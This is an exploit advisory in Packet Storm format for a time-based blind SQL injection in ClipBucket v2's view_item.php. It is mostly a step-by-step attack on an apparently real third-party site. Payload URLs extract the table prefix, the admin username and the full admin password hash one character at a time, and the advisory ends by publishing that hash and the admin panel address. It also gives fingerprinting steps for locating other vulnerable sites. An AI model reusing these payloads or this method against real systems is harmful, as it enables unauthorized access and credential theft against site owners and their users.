ClipBucket 2 Blind SQL Injection

2012-07-18T00:00:00
ID PACKETSTORM:114844
Type packetstorm
Reporter Akastep
Modified 2012-07-18T00:00:00

Description

                                        
===============================================================================  
Vulnerable Software: ClipBucket v2  
Official Site: http://clip-bucket.com/  
  
================================================================================  
Exploited: In Wild.   
================================================================================  
  
Vuln Desc:  
ClipBucket v2 is prone to a time-based blind SQL injection vulnerability: the collection parameter of view_item.php is injectable, and a payload of the form "... or (select if(<condition>,sleep(N),0))--" delays the response only when the condition is true, which gives a one-bit oracle.  
  
It seems to be a pretty old version and I'm a bit lazy to "fingerprint" which build is vulnerable.  
  
Anyway, at least the page source will "say": <!-- ClipBucket v2 -->  
  
To fingerprint whether a target site is vulnerable, simply request the URL below (if the response is delayed by roughly the sleep() argument, 50 seconds here, it is a vulnerable version):  
  
site.tld/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(1=1,sleep(50),0))--  
  
  
There is also another way to fingerprint it:  
On vulnerable versions you will find menus like the following (especially the Help entry on the index page):  
  
  
© ClipBucket v2 2012  
Home Contact Us About us Privacy Policy Terms of Serivce Help  
  
  
Real exploitation example:  
  
  
radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(length(table_name)=char(0x31),sleep(50),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--  
  
  
  
  
  
The table name here is 13 characters long:  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(length(table_name)=char(0x3133),sleep(50),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--  
  
  
  
  
Next we need to find out the table prefix:  
  
  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(table_name1,1)=char(0x30),sleep(50),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--  
  
  
  
  
  
  
This one returns true (a known-true comparison, 'a' = 'a', to confirm the oracle works):  
//TRUE  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(0x616263,1,1)=char(0x61),sleep(54),0))--  
  
  
//TRUE: first character of the table name:  
c  
=========================  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(table_name,1,1)=char(99),sleep(54),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--  
  
  
2nd character: b  
  
  
3rd character: _  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(table_name,3,1)=char(95),sleep(54),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--  
  
  
  
table prefix: cb_  
  
  
  
  
Checking the user id:  
  
//TRUE  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(userid=char(49),sleep(54),0) from cb_users limit 1)--  
  
  
ID=1  
  
UNAME: admin  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(username=char(97,100,109,105,110),sleep(54),0) from cb_users limit 1)--  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(username=char(97,100,109,105,110),sleep(54),0) from cb_users where userid=1)--  
  
  
  
How to extract the password (the stored MD5 hash), one character at a time:  
  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,1)=char(97),sleep(54),0) from cb_users where userid=1)--  
  
  
  
PASS:  
=======================================================  
1st character: 3  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,1)=char(51),sleep(54),0) from cb_users where userid=1)--  
  
OR (the same test with a hex literal instead of char()):  
  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,1)=0x33,sleep(54),0) from cb_users where userid=1)--  
  
  
RTIME: 56250 ms  
  
=======================================================  
2nd character: 5  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,2,1)=0x35,sleep(54),0) from cb_users where userid=1)--  
RTIME: 55578 ms  
=======================================================  
3rd character: c (the hex literals from here on are uppercase ASCII, e.g. 0x43 = 'C', while the hash is stored in lowercase; the test still matches because the default MySQL collation compares case-insensitively. To tell case apart, compare BINARY substr(...) instead.)  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,3,1)=0x43,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 55579 ms  
  
=======================================================  
4th character: 3  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,4,1)=0x33,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 55656 ms  
=======================================================  
5th character: a  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,5,1)=0x41,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56234 ms  
  
=======================================================  
6th character: 6  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,6,1)=0x36,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 69672 ms  
=======================================================  
7th character: a (check later)  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,7,1)=0x41,sleep(54),0) from cb_users where userid=1)--  
  
RTIME : 17266 ms  
=======================================================  
8th character: 6  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,8,1)=0x36,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56141 ms  
  
=======================================================  
9th character: 6  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,9,1)=0x36,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56125 ms  
=======================================================  
10th character: 2  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,10,1)=0x32,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56157 ms  
=======================================================  
11th character: 3  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,11,1)=0x33,sleep(54),0) from cb_users where userid=1)--  
  
  
RTIME: 55937 ms  
  
=======================================================  
12th character: b  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,12,1)=0x42,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56234 ms  
=======================================================  
13th character: 6  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,13,1)=0x36,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56219 ms  
  
========================================================  
14th character: 9  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,14,1)=0x39,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56297 ms  
  
========================================================  
  
15th character: 5  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,15,1)=0x35,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 55641 ms  
  
=========================================================  
16th character: f  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,16,1)=0x46,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56828 ms  
=========================================================  
  
17th character: 7  
  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,17,1)=0x37,sleep(54),0) from cb_users where userid=1)--  
  
  
RTIME: 56296 ms  
  
=========================================================  
  
18th character: 5 (check later)  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,18,1)=0x35,sleep(54),0) from cb_users where userid=1)--  
  
  
RTIME: 55469 ms  
  
==========================================================  
  
19th character: 6  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,19,1)=0x36,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56390 ms  
=========================================================  
20th character: b  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,20,1)=0x42,sleep(54),0) from cb_users where userid=1)--  
  
  
RTIME: 56375 ms  
  
========================================================  
  
21st character: d (check later)  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,21,1)=0x44,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 55796 ms  
  
  
=======================================================  
  
22nd character: d (check later)  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,22,1)=0x44,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56406 ms  
  
  
  
=======================================================  
23rd character: f  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,23,1)=0x46,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 55563 ms  
  
  
========================================================  
24th character: 0 (check later)  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,24,1)=0x30,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56172 ms  
  
========================================================  
25th character: 4  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,25,1)=0x34,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56078 ms  
  
========================================================  
26th character: 9  
  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,26,1)=0x39,sleep(54),0) from cb_users where userid=1)--  
  
  
RTIME: 55594 ms  
  
========================================================  
27th character: 6  
  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,27,1)=0x36,sleep(54),0) from cb_users where userid=1)--  
  
  
RTIME: 56094 ms  
  
  
========================================================  
28th character: 7  
  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,28,1)=0x37,sleep(54),0) from cb_users where userid=1)--  
  
  
RTIME: 56109 ms  
  
========================================================  
29th character: c  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,29,1)=0x43,sleep(54),0) from cb_users where userid=1)--  
  
  
RTIME: 55563 ms  
  
  
========================================================  
30th character: d  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,30,1)=0x44,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 55625 ms  
  
========================================================  
  
31st character: 5  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,31,1)=0x35,sleep(54),0) from cb_users where userid=1)--  
  
RTIME: 56188 ms  
  
  
=========================================================  
  
32nd character: 7  
  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,32,1)=0x37,sleep(54),0) from cb_users where userid=1)--  
  
  
RTIME: 55625 ms  
  
  
  
=========================================================  
So we got:   
  
uname: admin  
MD5 HASH: 35c3a6a6623b695f756bddf04967cd57  
Admin Panel: http://radio5.5.am/admin_area/  
  
  
//TRUE  
  
Verifying that the obtained hash is valid:  
This request also produces a delay, which tells us the obtained hash is correct (substr(password,1,33) returns the whole 32-character value, so the comparison only holds if every character matched):  
  
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,33)=0x3335633361366136363233623639356637353662646466303439363763643537,sleep(54),0) from cb_users where userid=1)--  
  
  
[ ]Done[ ]  
  
  
  
  
  
+++++++++My Special thanks to:+++++++++++++++++++++  
packetstormsecurity.org  
packetstormsecurity.com  
packetstormsecurity.net  
securityfocus.com  
cxsecurity.com  
security.nnov.ru  
securtiyvulns.com  
securitylab.ru  
1337day.com  
secunia.com  
securityhome.eu  
exploitsdownload.com  
exploit-db.com  
to all AA Team + to all Azerbaijan Black HatZ +   
*Especially to my bro CAMOUFL4G3.*  
++++++++++++++++++++++++++++++++++++++++++++++++  
  
Respect && Thank you.  
  
/AkaStep ^_^  
  
  
  